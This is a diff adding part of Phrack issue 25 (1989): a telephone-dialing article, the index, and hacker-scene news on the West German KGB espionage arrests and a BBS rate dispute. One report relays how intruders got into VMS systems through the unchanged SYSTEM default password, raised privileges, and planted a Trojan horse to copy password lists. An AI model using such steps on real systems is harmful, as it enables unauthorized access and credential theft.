+present and only an additional switch contact is needed to use it.
+
+What is not generally known is that the United States Air Force uses a
+different set of Touchtone frequencies, in the range of 1020 to 1980 Hz.  Since
+many of the phones available for purchase in stores come from Department of
+Defense surplus sales, it will be interesting when these phones become
+available.
+
+Another Touchtone dial presently used by amateurs is made up from a thin
+elastomeric switch pad made by the Chomerics Corporation (77 Dragon Court,
+Woburn, Mass. 01801) and a thick-film hybrid IC made by Microsystems
+International (800 Dorchester Boulevard, Montreal, Quebec).  The pad is the
+Chomerics ER-20071, which measures about 2 1/4 inch wide by 3 inches high, and
+only about 3/16 inch thick (Chomerics also makes a smaller model ER21289, but
+it is very difficult to use and also apparently unreliable).  Microsystems
+International makes several very similar ICs in the ME8900 series, which use
+different amounts of power and generate different amounts of audio.  Some of
+these also contain protection diodes to avoid problems if you use the wrong
+polarity on the IC, and there are so many models to choose from that you should
+get the technical data from the manufacturer before ordering one.  There are a
+number of United States distributors, including Newark Electronics, Milgray and
+Arrow Electronics in New York.
+
+One of the problems with any current IC oscillator is that the frequency
+changes if rf gets near it.  Many hams are having a hard time mounting such IC
+pads on their 2 meter handie-Talkies.  A solution seems in sight as Mostek, a
+large IC company, is coming out with an IC Touchtone generator which has a
+cheap 3.58 MHz external crystal as reference, and then produces the tone
+frequencies by dividing the 3.58 MHz down with flip flops to get the required
+tone frequencies.  This approach not only promises to be more reliable in the
+presence of rf, but should also be cheaper since it would not need the custom
+(and expensive) laser trimming of components that the Microsystems
+International IC needs to adjust the frequencies within tolerance.
+
+At the other end of the telephone circuit, in the CO, various circuits are used
+to decode the digit you dial into the appropriate signals needed to perform the
+actual connection.  In dial systems, this decoding is done by relay circuits,
+such as steppers.  This circuitry is designed for dialing at the rate of 10
+pulses per second, with a duty cycle of about 60% open, 40% closed.  The
+minimum time between digits is about 600 milliseconds, although a slightly
+greater time between digits is safer since it avoids errors.
+
+In practice, many COs will accept dialing at substantially slower or faster
+rates, and often you will see a dial that has been speeded up by changing the
+mechanical governor to operate almost twice as fast; it depends on the type of
+CO equipment.
+
+Touchtone decoding is usually done by filter circuits which separate out the
+Touchtone tones by filters and then use a transistor circuit to operate a
+relay.  A common decoder is the 247B, which is designed for use in small dial
+switchboard systems of the type that would be installed on the premises of a
+business for local communication between extensions.  It consists of a limiter
+amplifier, seven filters and relay drivers (one for each of the seven tones
+commonly used) and some timing and checking circuitry.  Each of the seven
+relays has multiple contacts, which are then connected in various
+series/parallel combinations to provide a grounding of one of ten output
+contacts, when a digit is received.  The standard 247B does not recognize the *
+and  digits, but can be modified easily enough if you have the unit diagram.
+
+The 247B decoder is not very selective, and can easily be triggered by voice
+unless some additional timing circuits are connected at the output to require
+that the relay closure exceed some minimum time interval before it is accepted.
+Slightly more complicated decoders which have the time delays built in are the
+A3-type and the C-type Touchtone Receivers.  both of these are used in
+customer-owned automatic switchboards when a caller from the outside (via the
+telephone company) wants to be able to dial directly into the private
+switchboard to call a specific extension.
+
+The C-type unit is similar to the 247B in that it has ten outputs one for each
+digit.  The A3-type does not have output relays, but instead has seven voltage
+outputs, one for each of the seven basic tones, for activating external 48-volt
+relays.  The A-3 unit is ideal for activating a Touchtone encoder, which can
+then be used to regenerate the Touchtone digits if the original input is noisy.
+This might be very useful in a repeater autopatch, for cleaning up Touchtone
+digits before they are sent into the telephone system.
+
+In addition to the above, there are probably other types of units specially
+designed for use in the CO, but information on these is not readily available.
+It is also fairly easy to build a Touchtone decoder from scratch.  Though the
+standard telephone company decoders all use filter circuits, it is much easier
+(though perhaps not as reliable) to use NE567 phase-locked-loop integrated
+circuits.
+
+An interesting sidelight to Touchtone operation is that it greatly speeds up
+the process of placing a call.  With a Touchtone dial it is possible to dial a
+call perhaps 3 or 5 times faster than with a rotary dial.  Since the CO
+equipment which receives and decodes the number is only needed on your line
+during the dialing time, this means that this equipment can be switched off
+your line sooner and can therefore handle more calls.  In fact, the entire
+Touchtone system was invented so that CO operation would be streamlined and
+less equipment would be needed for handling calls.  It is ironic that the
+customer should be charged extra for a service which not only costs the
+telephone company nothing, but even saves it money.
+
+Another practice which may or may not cost the company money is the connection
+of privately-owned extension phones.  You have probably seen these sold by mail
+order houses and local stores.  The telephone companies claim that connecting
+these phones to their lines robs them of revenue and also may cause damage to
+their equipment.  There are others, of course, who hold the opinion that the
+easy availability of extensions only causes people to make more calls since
+they are more convenient, and that the companies really benefit from such use.
+The question of damage to equipment is also not easily answered, since most of
+the extension phones are directly compatible, and in many cases the same type
+as the telephone company itself uses.  Be that as it may, this may be a good
+time to discuss such use.
+
+Prior to an FCC decision to telephone company interconnection in the Carterfone
+case in 1968, all telephone companies claimed that the connection of any
+equipment to their lines was illegal.  This was a slight misstatement as no
+specific laws against such use were on the books.  Instead, each local
+telephone company had to file a tariff with the public service commission in
+that state, and one of the provisions of that tariff was that no connection of
+any external equipment was allowed.  By its approval of that tariff, the public
+service commission gave a sort of implicit legal status to the prohibition.
+
+In the Carterfone case, however, the FCC ruled that the connection of outside
+equipment had to be allowed.  The phone companies then relaxed their tariff
+wording such that connection of outside equipment was allowed if this
+connection was through a connecting arrangement provided by the telephone
+company for the purpose of protecting its equipment from damage.  Although this
+result has been challenged in several states, that seems to be the present
+status.  The strange thing is that some telephone companies allow
+interconnection of customer equipment without any hassle whatsoever, while
+others really make things difficult for the customer.
+_______________________________________________________________________________
diff --git a/phrack25/1.txt b/phrack25/1.txt
new file mode 100644
index 0000000..a98250b
--- /dev/null
+++ b/phrack25/1.txt
@@ -0,0 +1,40 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 1 of 11
+
+                    Phrack Inc. Newsletter Issue XXV Index
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                                March 29, 1989
+
+     Welcome to Phrack Inc. Issue 25 -- The beginning of Volume Three of the
+Phrack Inc. Newsletter.  We have been around since November 17, 1985 and we're
+proud to be still going strong.
+
+     In this issue, we feature two really decent articles that deal with Unix
+and a special index file that chronicles all 25 issues of Phrack Inc. to date.
+Special thanks for help in the compilation of this file goes to Prime Suspect,
+Red Knight, and Hatchet Molly.  Also, more details concerning SummerCon '89
+appear in Phrack World News XXV and again, further information will be released
+as it develops.  We hope you enjoy it!
+
+     As always, we ask that anyone with network access drop us a line to either
+our Bitnet accounts or our Internet addresses...
+
+               Taran King                        Knight Lightning
+          C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
+       C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXV Index by Taran King and Knight Lightning
+2.  25th Anniversary Index by Knight Lightning, Taran King, and other friends
+3.  Bell Network Switching Systems by Taran King
+4.  SPAN:  Space Physics Analysis Network by Knight Lightning
+5.  Unix Cracking Tips by Dark OverLord
+6.  Hiding Out Under Unix by Black Tie Affair
+7.  The Blue Box And Ma Bell by The Noid
+8.  Hacking:  What's Legal And What's Not by Hatchet Molly
+9.  Phrack World News XXV/Part 1 by Knight Lightning
+10. Phrack World News XXV/Part 2 by Knight Lightning
+11. Phrack World News XXV/Part 3 by Knight Lightning
diff --git a/phrack25/10.txt b/phrack25/10.txt
new file mode 100644
index 0000000..1d7e604
--- /dev/null
+++ b/phrack25/10.txt
@@ -0,0 +1,438 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 25, File 10 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXV/Part 2                 PWN
+            PWN                                                 PWN
+            PWN                 March 29, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+German Hackers Break Into Los Alamos and NASA                     March 2, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Three hours ago, a famous German TV-magazine revealed maybe one of the greatest
+scandals of espionage in computer networks:  They talk about some (three to
+five) West German hackers breaking into several secret data networks (Los
+Alamos, Nasa, some military databases, (Japanese) war industry, and many
+others) in the interests of the KGB, USSR.  They received sums of $50,000 to
+$100,000 and even drugs, all from the KGB, the head of the political
+television-magazine said.
+
+The following news articles (and there are a lot) all deal with (directly and
+indirectly) the recent Spy scandal situation that occurred in West Germany.
+The majority of the articles shown here are taken from RISKS Digest, but they
+have been edited for this presentation.
+
+This presentation contains some information not previously seen (at least not
+in this format).
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Computer Espionage:  Three "Wily Hackers" Arrested                March 2, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Three hackers have been arrested in Berlin, Hamburg and Hannover, and they are
+accused of computer espionage for the Soviet KGB.  According to the television
+magazine "Panorama" (whose journalists have first published the NASA and SPAN
+hacks), they intruded scientific, military and industry computers and gave
+passwords, access mechanisms, programs and data to 2 KGB officers; among
+others, intrusion is reported of the NASA headquarters, the Los Alamos and
+Fermilab computers, the United States Chief of Staff's data bank OPTIMIS, and
+several more army computers.  In Europe, computers of the French-Italian arms
+manufacturer Thomson, the European Space Agency ESA, the Max Planck Institute
+for Nuclear Physics in Heidelberg, CERN/GENEVA and the German Electron
+Accelerator DESY/Hamburg are mentioned.  The report says that they earned
+several 100,000 DM plus drugs (one hacker evidently was drug addict) over about
+3 years.
+
+For the German Intelligence authorities, this is "a new quality of espionage."
+The top manager said that they had awaited something similar but are
+nevertheless surprised that it happened so soon and with such broad effects.
+
+Summarizing the different events which have been reported earlier -- NASA and
+SPAN hacks, Clifford Stoll's report of the "Wily Hacker" -- I regard this as
+essentially the final outcome of the Wily Hackers story (with probably more
+than the 3 which have now been imprisoned).  It is surprising that the
+Intelligence authorities needed so long time (after Cliff's Communications Of
+The ACM report, in May 1988) to finally arrest and accuse these crackers.
+Moreover, the rumors according to which design and production plans of a
+Megabit chip had been stolen from Philips/France computers seems to become
+justified; this was the background that CCC hacker Steffen Wernery had been
+arrested, for several months, in Paris without being accused.  CAD/CAM programs
+have also been sold to KBG.
+
+                            Information Provided By
+                               Klaus Brunnstein
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Computer Spy Ring Sold Top Secrets To Russia                      March 3, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+West German counter-intelligence has uncovered a spy ring centered on computer
+hackers suspected of having supplied the Soviet Union with top secret military
+and economic information.
+
+They are said to have penetrated computer networks in the United States,
+Western Europe and Japan, according to a television report last night.
+
+In a special program, the North German Broadcasting Network said that thousands
+of computer codes, passwords and programs which allowed the Soviet Union access
+to major computer centers in the Western world have been passed on by the
+hackers.  They had been recruited by the KGB in 1985 and are alleged to have
+supplied the information in return for money and drugs.
+
+In Karlsruhe, the West German Chief Public Prosecutor's Office, which is in
+charge of spy cases, would only confirm last night that three arrests have been
+made March 2nd during house searches in Hannover and West Berlin.
+
+Those detained were suspected of "having obtained illegally, through hacking
+and in exchange for money, information which was passed on to an Eastern secret
+service."
+
+But the spokesman did not share West German television's evaluation, which said
+the case was the most serious since the unmasking in 1974 of an East German
+agent in the office of ex-Chancellor Willy Brandt.  The Interior Ministry in
+Bonn last night also confirmed several arrests and said the suspects had
+supplied information to the KGB.  The arrests followed months of investigations
+into the activities of young computer freaks based in Hamburg, Hannover and
+West Berlin, the ministry said.
+
+According to the television report, the hackers gained access to the data banks
+of the Pentagon, NASA Space Center, and the nuclear laboratory in Los Alamos.
+
+They also penetrated leading West European computer centers and armament
+companies, including the French Thomson group, the European Nuclear Research
+Center, CERN, in Geneva; the European Space Authority, ESA, and German
+companies involved in nuclear research.
+
+The Russians are alleged to have put pressure on the hackers because of their
+involvement with drugs, and to have paid several hundred thousands marks for
+information, the program said.
+
+West German security experts on the evening of March 2nd described the new spy
+case as "extremely grave."  The KGB has been provided with a "completely new
+possibility of attack" on Western high technology and NATO military secrets.
+The sources said it was "sensational" that the hackers should have succeeded in
+penetrating the US defense data systems from Western Europe.
+
+The North German Broadcasting Network program said its research was based on
+information given by two members of the suspected espionage ring.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+KGB Computer Break-Ins Alleged In West Germany                    March 3, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken From the International Herald Tribune
+
+Bonn - Three West German computer hackers have been arrested on suspicion of
+infiltrating computer networks worldwide to obtain secret data for an East
+block intelligence service, prosecutors said on March 2nd.
+
+A spokesman for the federal prosecutor, Alexander Prechtel, confirmed that
+three men were arrested, but did not identify the East Block country involved
+or the networks infiltrated.
+
+The ARD television networks "Panorama" program, the thrust of which the
+spokesman confirmed, said the hackers had passed secrets from a range of highly
+sensitive U.S., French, and West German computer networks to the KGB, the
+Soviet secret police.
+
+The television report said it was the worst such espionage case to be uncovered
+in West Germany since the 1974 exposure of Guenter Guillaume, an East German
+spy who was a top aide to Willy Brandt, then the West German chancellor.
+
+Among the systems believed to have been infiltrated were the U.S.:  Defense
+Department's staff data bank, the U.S. nuclear arms laboratory in Los Alamos,
+New Mexico, the National Aeronautics and Space Administration, and U.S.
+military supply depots.
+
+The report said other systems entered were at the French arms and electronics
+company Thomson SA, a European nuclear-research center in Geneva, the European
+Space Agency and the Max-Planck Institute for Nuclear Physics in West Germany.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+News From The KGB/Wily Hackers                                    March 7, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Now, five days after the "sensational" disclosure of the German (NDR) Panorama
+Television team, the dust of speculations begins to rise and the facts become
+slowly visible; moreover, some questions which could not be answered in
+Clifford Stoll's Communications of the ACM paper may now be answered.  Though
+not all facts are known publicly, the following facts seem rather clear.
+
+    - In 1986, some hackers from West Berlin and Hannover discussed, in "hacker
+      parties" with alcohol and drugs, how to solve some personal financial
+      problems; at that time, first intrusions of scientific computers
+      (probably CERN/Geneva as hacker training camp) and Chaos Computer Club's
+      spectacular BTX-intrusion gave many hackers (assisted by newsmedia) the
+      *puerile impression* that they could intrude *into every computer
+      system*; I remember contemporary discussions on 1986/87 Chaos Computer
+      Conferences about possibilities, when one leading CCC member warned that
+      such hacks might also attract espionage (Steffen Wernery recently
+      mentioned that German counter-espionage had tried several times to hire
+      him and other CCC members as advisors -- unsuccessfully).
+
+    - A "kernel group" of 5 hackers who worked together, in some way, in the
+      "KGB case" are (according to Der SPIEGEL, who published the following
+      names in its Monday, March 6, 1989 edition):
+
+      -> Markus Hess, 27, from Hannover, Clifford Stoll's "Wily Hacker" who was
+         often referred to as the Hannover Hacker and uses the alias of Mathias
+         Speer; after having ended (unfinished) his studies in mathematics, he
+         works as programmer, and tries to get an Informatics diploma at the
+         University of Hagen (FRG); he is said to have good knowledge of VMS
+         and UNIX.
+
+      -> Karl Koch, 23, from Hannover, who works as programmer; due to his
+         luxurious lifestyle and his drug addiction, his permanent financial
+         problems have probably added to his desire to sell "hacker knowledge"
+         to interested institutions.
+
+      -> Hans Huebner, alias "Pengo," from Berlin, who after having received
+         his Informatics diploma from Technical University of West Berlin,
+         founded a small computer house; the SPIEGEL writes that he needed
+         money for investment in his small enterprise; though he does not
+         belong to the Chaos Computer Club, he holds close contacts to the
+         national hacker scenes (Hamburg: Chaos Computer Club; Munich: Bavarian
+         Hacker Post; Cologne: Computer Artists Cologne, and other smaller
+         groups), and he was the person to speak about UUCP as a future
+         communications medium at the Chaos Communication Congress.
+
+      -> Dirk Brezinski, from West Berlin, programmer and sometimes
+         "troubleshooter" for Siemens BS-2000 systems (the operating system of
+         Siemens mainframe computers), who earned, when working for Siemens or
+         a customer (BfA, a national insurance for employees) 20,000 DM (about
+         $10,800) a month; he is regarded (by an intelligence officer) as "some
+         kind of a genius."
+
+      -> Peter Carl, from West Berlin, a former croupier, who "always had
+         enough cocaine."  No information about his computer knowledge or
+         experience is available.
+
+After successfully stimulating KGB's interest, the group (mainly Hess and Koch)
+committed their well-documented hacks [See Clifford Stoll's "Stalking the Wily
+Hacker," Communications of the ACM, May 1988].  SPIEGEL writes that the group
+*sold 5 diskettes full of passwords*, from May to December 1986, to KGB
+officers which they met in East Berlin; when Bremen University computer center,
+their favorite host for transatlantic hacks, asked the police to uncover the
+reasons for their high telephone bills, they stopped the action.
+
+This statement of Der SPIEGEL is probably wrong because, as Cliff describes,
+the "Wily Hacker" successfully worked until early 1988, when the path from his
+PC/telephone was disclosed by TYMNET/German Post authorities.  The German
+public prosecutors did not find enough evidence for a trial, when examining
+Hess' apartment; moreover, they had acquired the material in illegal actions,
+so the existing evidence could not be used and finally had to be scratched!
+
+In Hess' apartment, public prosecutors found (on March 3, 1989) password lists
+from other hacks.  On Monday, March 6, 1989, the Panorama team (who had
+disclosed the NASA hack and basically the KGB connection) asked Klaus
+Brunnstein to examine some of the password lists; the material which he saw
+(for 30 minutes) consisted of about 100 photocopied protocols of a hack during
+the night of July 27 to 28, 1987; it was the famous "NASA hack."  From a VAX
+750 (with VMS 4.3), which they entered via DATEX-P (the German packed-switched
+data-exchange network, an X.25 version), where they evidently previously had
+installed a Trojan horse (UETFORT00.EXE), they tried, via SET HOST... to
+log-into other VAXes in remote institutes.  They always used SYSTEM account and
+the "proper" password (invisible).
+
+Remark:  Unfortunately, DEC's installation procedure works only if a SYSTEM
+         account is available; evidently, most system managers do not change
+         the preset default password MANAGER; since Version 4.7, MANAGER is
+         excluded, but on previous VMS versions, this hole probably exists in
+         many systems!
+
+Since the hackers, in more than 40% of the cases, succeeded to login, their
+first activities were to SET PRIV=ALL; SET PRIO=9, and then to install (via
+trans-net copy) the Trojan horse.  With the Trojan horse (not displayed under
+SHow Users), they copied the password lists to their PCs.  When looking through
+the password list, Klaus observed the well-known facts:  More than 25% female
+or male first names, historical persons, countries, cities, or local dishes (in
+the Universities of Pisa, Pavia, and Bologna, INSALATA was/is a favorite
+password of several people).  Only in CASTOR and POLLUX, the password lists
+contained less than 5% passwords of such nature easy to guess!
+
+Apart from many (about 39) unsuccessful logins, many different CERN/GENEVA,
+NASA systems (CASTOR, POLLUX, Goddard and Ames Space Flight Centers), several
+USA, GB, French, Italian and some German institutes connected in SPAN were
+"visited."  The documented session was from July 27, 10 p.m. to July 28, 1 a.m.
+
+The media report that other hacks (probably not all committed by Hess and Koch
+themselves) were sold to KGB.  Among them, Electronic and Computer Industry
+seem to be of dominant interest for the USSR.  If special CAD/CAM programs and
+Megabit designs (especially from Thomson/France, from VAX systems) have been
+stolen, the advantage and value for the USSR cannot be (over)estimated.
+
+In FRG, the current discussion is whether the hackers succeeded to get into
+"kernel areas" or only "peripheral areas."  This discussion is ridiculous since
+most "peripheral systems" contain developments (methods, products) for future
+systems, while the "kernel systems" mainly contain existing applications (of
+past architectures).
+
+The well-known hackers (especially CCC) have been seriously attacked by some
+media.  My best guess is that CCC was itself *a victim* because the group
+succeeded to informally get much of the information which they needed for some
+of the hacks, and which they finally sold to KGB.  Apart from "Pengo," there
+doesn't seem to be a close relation between CCC and the KGB/Wily Hackers.
+Nevertheless, CCC and others, like Cheshire Catalyst in the USA, have prepared
+a climate where espionage inevitably sprang-off.
+
+                            Information Provided By
+                               Klaus Brunnstein
+_______________________________________________________________________________
+
+Pengo Speaks Out About The KGB Hackers And More                  March 10, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The following are statements made by Pengo to Phrack Inc. during an interview
+with Knight Lightning;
+
+KL:  What is your response to the accusations of being a KGB spy?
+
+P:   I have been involved into this espionage circle throughout some months in
+     1986.  I did not actually work for the KGB, nor did I hand out hacker
+     information to the East.  All my hacking activities since then have been
+     for the pure purpose of personal enlightenment.  I never hid my name
+     before, and I won't go undercover now that the real story comes to the
+     surface.
+
+     In the middle of 1988, I informed the West German authorities (secret
+     service) about my involvement with the KGB.  This is one of the main
+     reasons for the big busts last week.  I have to live with the fact that
+     some hackers now think I am working for the authorities now.  I don't, and
+     I will try anything to avoid getting into all these secret
+     service/espionage problems again.
+
+KL:  What about the statements made in DER SPIEGEL?
+
+P:   They published my name and claimed that I was "very active" for the east,
+     but also that I am the :most hopeful head in West Berlin's hacking scene."
+     I now try to make the best out of this publicity.
+
+KL:  Klaus Brunnstein made some strong statements about you in RISKS Digest,
+     what did you think of that?
+
+P:   It really upsets me a lot.  Klaus Brunnstein doesn't know anything
+     detailed about this case, but he seems to love seeing himself as the
+     insider in the German scene. At the last congress I got in kind of a
+     dispute with him.  He could not understand why I, as a computer scientist,
+     still support hackers.  Perhaps this is one of the reasons for his
+     publication.
+
+KL:  Any other comments?
+
+P:   What I would be interested in hearing about the reaction to this situation
+     from the United States hackers' point of view.  I have already heard that
+     most people seem to believe that the whole Chaos Computer Club is an
+     association of spies.  This is of course untrue.
+
+KL:  What do you intend to do about the bad press you have received?
+
+P:   I have posted a reply to Brunnstein's posting in RISKS (shown in next
+     article).  Apart from Hagbard, those guys never were hackers, and it seems
+     to turn out that they have really been mere spies.
+
+KL:  Were there any other repercussions to this case besides bad publicity?
+
+P:   Currently, I'm puzzling out a new way of earning money, since my company
+     decided to fire me.  That's what you get if you play with fire :-)
+
+     Luckily, I'm optimist!
+
+-Pengo
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Pengo Speaks In RISKS Digest                                     March 10, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In RISKS Digest, Klaus Brunnstein mentioned my name in the context of the
+hacker/espionage case recently discovered by the German authorities.  Since Mr.
+Brunnstein is not competent to speak about the background of the case, I'd like
+to add some clarification to prevent misunderstandings, especially concerning
+my role.  I think it is a very bad practice to just publish names of people
+without giving background information.
+
+I have been an active member of the net community for about two years now, and
+I want to explicitly express that my network activities have in no way been
+connected to any contacts to secret services, be it Western or Eastern ones.
+
+On the other hand, it is a fact that when I was younger (I'm 20 years old now),
+there had been a circle of people which tried to make deals with an eastern
+secret service.  I have been involved in this, but I hope that I did the right
+thing by giving the German authorities detailed information about my
+involvement in the case in the summer of 1988.
+
+As long as the lawsuit on this case is still in progress, I am not allowed to
+give out any details about it to the public.  As soon as I have the freedom to
+speak freely about all of this, I'll be trying to give a detailed picture about
+the happenings to anyone who's interested.
+
+I define myself as a hacker.  I acquired most of my knowledge by playing around
+with computers and operating systems, and yes, many of these systems were
+private property of organizations that did not even have the slightest idea
+that I was using their machines.  I think that hackers (people who creatively
+handle technology and not just see computing as their job) do a service for the
+computing community in general.  It has been pointed out by other people that
+most of the "interesting" modern computer concepts have been developed or
+outlined by people who define themselves as "hackers."
+
+When I started hacking foreign systems, I was 16 years old.  I was just
+interested in computers, not in the data which has been kept on their disks.
+As I was going to school at that time, I didn't even have the money to buy my
+own computer.  Since CP/M (which was the most sophisticated OS I could use on
+machines which I had legal access to) didn't turn me on anymore, I enjoyed the
+lax security of the systems I had access to by using X.25 networks.
+
+You might point out that I should have been patient and wait until I could go
+to the university and use their machines.  Some of you might understand that
+waiting was just not the thing I was keen on in those days.  Computing had
+become an addiction for me, and thus I kept hacking.  I hope this clears the
+question "why."
+
+It was definitely NOT to give the Russians any advantage over the USA, nor to
+become rich and get a flight to the Bahamas as soon as possible.  The results
+of the court trial will reveal this again, but until then I want to keep rumors
+out that the German hackers were just the long (?) arm of the KGB to harm
+Western computer security or defense power.
+
+It should also be pointed out that the Chaos Computer Club has in no way been
+connected to this recent case, and again, that the CCC as an organization has
+never been a "hacker group."  The CCC merely handles the press for hackers, and
+tries to point out implications of computers and communications for society in
+general.
+
+I have already lost my current job, because of my name being published in DER
+SPIEGEL and in RISKS.  My business partners became anxious about my involvement
+in the case.  Several projects I was about to complete in the near future have
+been cancelled, which forces me to start again at the beginning in some way.
+
+                                                    -Hans Huebner
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Klaus Brunnstein Reacts To Pengo In RISKS Digest                 March 14, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+"Pengo" Hans Huebner stated that he had no share in the KBG case as I mentioned
+in my report.  Since I myself had no share in the KGB case (and in this sense,
+I am not as good a source as Pengo!), I tried to transmit only information
+where I had at least *two independent sources* of *some credibility*.  In
+Pengo's case (where I was rather careful because I could not believe what I
+read), my two sources were:
+
+    - The SPIEGEL report (I personally agree that names should be avoided as
+      long as current investigations are underway; yet in this cases, the names
+      have been widely published in FRG and abroad);
+
+    - A telephone conversation with a leading Chaos Computer Club person after
+      he had informed me about a public debate at Hannover fair (where the
+      German daily business newspaper, Wirtschafts, which had organized a
+      discussion with data protection people and CCC).
+
+      I asked him whether he knew of Pengo's contribution; he told me that
+      he directly asked Pengo, "Did you, without pressure and at your own
+      will, work for the Russians?"  Pengo answered, "Yes."  He told me that
+      he immediately cut-off any contact to Pengo.  Evidently, there was a
+      controversial discussion in Chaos Computer Club whether on should react
+      in such a strict manner.  I understand the strong reaction because the
+      KGB hackers severely damaged the CCC's attempt to seriously contribute to
+      the public discussion of some of the social consequences of computers.
+      They now face, more seriously than before, the problem of being regarded
+      as members of a criminal gang.
+
+-Klaus Brunnstein
+_______________________________________________________________________________
diff --git a/phrack25/11.txt b/phrack25/11.txt
new file mode 100644
index 0000000..622d883
--- /dev/null
+++ b/phrack25/11.txt
@@ -0,0 +1,344 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 25, File 11 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXV/Part 3                 PWN
+            PWN                                                 PWN
+            PWN                 March 29, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Southwestern Bell Vs. Bulletin Board Operators                February 27, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+For those of you unfamiliar with the situation, there is a major battle between
+Southwestern Bell Telephone company and bulletin board operators in Oklahoma
+City, Oklahoma.  Southwestern Bell demands the right to charge more for phone
+lines being used for the operation of bulletin boards.  They claim that data
+communications should be charged more to begin with and that running a bulletin
+board is like a business and business lines should cost more than residential
+lines.
+
+Currently the conflict is being described as a stalemate.  Southwestern Bell is
+using a war-dialer in an attempt to find out what numbers are actually bulletin
+board numbers.  Several bulletin boards have already gone down because of this.
+However, in support of the BBS community is a major television news station (a
+CBS affiliate I believe) and several corporate lawyers have also taken an
+interest in he BBS side.  The lawyers say that a court case had come up several
+years ago concerning bulletin boards and Southwestern Bell.  In that case SWB
+lost which meant that it is illegal for SWB to raise the rates in Oklahoma City
+for bulletin board phone lines.
+
+Southwestern Bell has been deceitfully trying to trick system operators
+(sysops) into saying that they make money off of their systems.  They get the
+sysops to say that they run "non-profit" bulletin boards.  Non-profit implies
+that you are taking in income to offset your expenses, but do not make a
+profit.  This is simply not true for most bulletin boars; they do not take in
+anything.  In the meantime, these poor victims are getting their rates
+increased.  It has spread through the bulletin board community in Oklahoma City
+like wildfire and they are just now getting wise to Southwestern Bell's fraud.
+
+Fortunately, the bulletin board users of Oklahoma City are a very vocal bunch
+of people and many of them are calling Southwestern Bell by the hundreds and
+telling them that if they raise the rates of the bulletin boards, they will
+have their secondary lines taken out.  Many sysops have said the same.  This is
+the stalemate right now.  Apparently, the Southwestern Bell executives are
+realizing that if they do this they will actually make less money than if they
+leave the bulletin boards alone.  After all, their whole purpose is to make
+more money.  A user organization is being put together in Oklahoma City in an
+attempt to stir up enough opposition to this move by Southwestern Bell for them
+to reconsider.  So far it is working, though they are far from a settlement.
+
+The latest news heard from one of the leaders of this new user group was that
+some major big-wig of Southwestern Bell and AT&T had flown into Oklahoma City
+in an uproar about the actions taken by Southwestern Bell so far.  Apparently,
+they do not like what the local executives are doing.  In addition, the lawyers
+who have agreed to help are investigating a similar incident out in California.
+
+This is the general manager's office.  It might be useful to call this number
+and indicate that the bad publicity is spreading outside of Oklahoma City;
+maybe Southwestern Bell will rethink their position.
+
+                            Information Provided By
+                                Various Sources
+_______________________________________________________________________________
+
+Attention Telecommunication Fanatics                              March 7, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The following was taken from TELECOM Digest, an Internet newsletter...
+
+
+From: Red Knight
+Subject: Review of Bulletin Board System
+
+Please accept my invitation to the a Telecommunication Oriented Bulletin Board
+System, located in Flushing New York.
+
+Our main objective is to discuss about the various telephony related concepts,
+for example, ESS, DMS, COSMOS, Cellular, Mobile, Satellite Communications,
+Fiber Optic, PBX, Centrex, Phone Rates, Signalling Systems, World Wide
+Telephone, Switching Systems, ISDN.
+
+We are trying to get as many knowledgeable users as we possibly can.
+
+Not only does our Bulletin Board Specialize in Telecommunication, but also has
+a few conferences for Computer Security.  We certainly have many experts on
+board who would be willing to discuss security related material.
+
+We have a UNIX conference were all the UNIX wizards get together.  We have a
+special DEC User group.  We also a conference for discussions on Viruses and
+how it can be written and prevented.
+
+Other conferences are as follows: Radio Hobbies>Hacking News>LockSmithing,
+                                  Pyrotechnics>Telco Numbers>TAP>Books>
